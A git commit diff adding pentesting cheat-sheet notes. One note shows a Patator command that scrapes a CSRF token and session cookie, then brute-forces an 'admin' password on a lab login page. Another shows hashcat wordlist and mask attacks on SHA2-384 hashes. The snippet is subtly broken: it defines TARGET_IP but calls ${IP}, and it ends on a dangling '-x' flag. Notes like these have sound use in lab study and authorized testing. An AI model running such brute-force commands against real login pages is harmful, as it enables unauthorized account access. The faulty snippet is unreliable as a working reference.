added bruteforcing stuff

hashes/bruteforce/patator.md

@@ -0,0 +1,23 @@
+# Patator Bruteforcing
+
+* [Lanjelot's Repo](https://github.com/lanjelot/patator/)
+
+## Modules
+
+* Available modules can be found under `patator --help`
+* Module specifics can be found via `patator <module> -h`
+
+## Using a Module
+
+* For example `http_fuzz` can be used via
+```sh
+TARGET_IP=10.0.47.11
+CSRF=$(curl -s -c stored.cookie "${IP}/login.php" | awk -F 'value=' '/user_token/ {print $2}' | cut -d "'" -f2)
+SESSION_ID=$(grep PHPSESSID stored.cookie | awk -F ' ' '{print $7}')
+
+echo "The CSRF is: $CSRF"
+echo "The PHPSESSID is: $SESSION_ID"
+
+patator.py http_fuzz method=POST --threads=64 timeout=10 url="http://${TARGET_IP}/login.php" 0=passwords.txt body="username=admin&password=FILE0&Login=Login&user_token=${CSRF}" header="Cookie: PHPSESSID=${SESSION_ID}; security=impossible" -x quit:fgrep!=login.php -x ignore:fgrep='Location: login.php' -x 
+```
+

hashes/hashcat_utils.md

@@ -1,5 +1,9 @@
 # Hashcat Utilities
 
+* [Modes](https://hashcat.net/wiki/doku.php?id=example_hashes)
+
+## Wordlists
+
 * Combine wordlists
 ```sh
 combinator wordlist.txt otherwordlist.txt > newwordlist.txt
@@ -9,3 +13,12 @@ combinator wordlist.txt otherwordlist.txt > newwordlist.txt
 ```sh
 hashcat --force <input.txt> -r /opt/hashcat/rules/best64.rule --stdout > wordlist.txt
 ```
+
+## Using Masks
+
+* A mask can be set instead of a wordlist, this charset is then brute forced by iterating the charset
+* [Masks](https://hashcat.net/wiki/doku.php?id=mask_attack)
+* Bruteforcing seven lowerspace characters using `SHA2-384` as an example  
+```sh
+hashcat -m 10800 -a 3 hash.out ?l?l?l?l?l?l?l
+```